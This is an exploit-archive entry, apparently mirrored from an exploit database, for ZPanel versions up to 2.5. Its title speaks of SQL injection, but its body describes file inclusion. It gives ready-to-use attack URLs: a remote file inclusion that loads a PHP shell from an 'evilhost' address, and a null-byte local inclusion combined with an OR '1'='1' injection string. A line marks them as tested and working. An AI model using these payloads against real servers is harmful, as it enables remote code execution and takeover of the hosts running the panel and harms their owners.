[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ZPanel <= 2.5 Remote SQL Injection Exploit
# Published : 2005-03-15
# Author : Mikhail
# Previous Title : phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
# Next Title : phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)
# Tested and working /str0ke
It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.
[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script
[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1
# www.Syue.com [2005-03-15]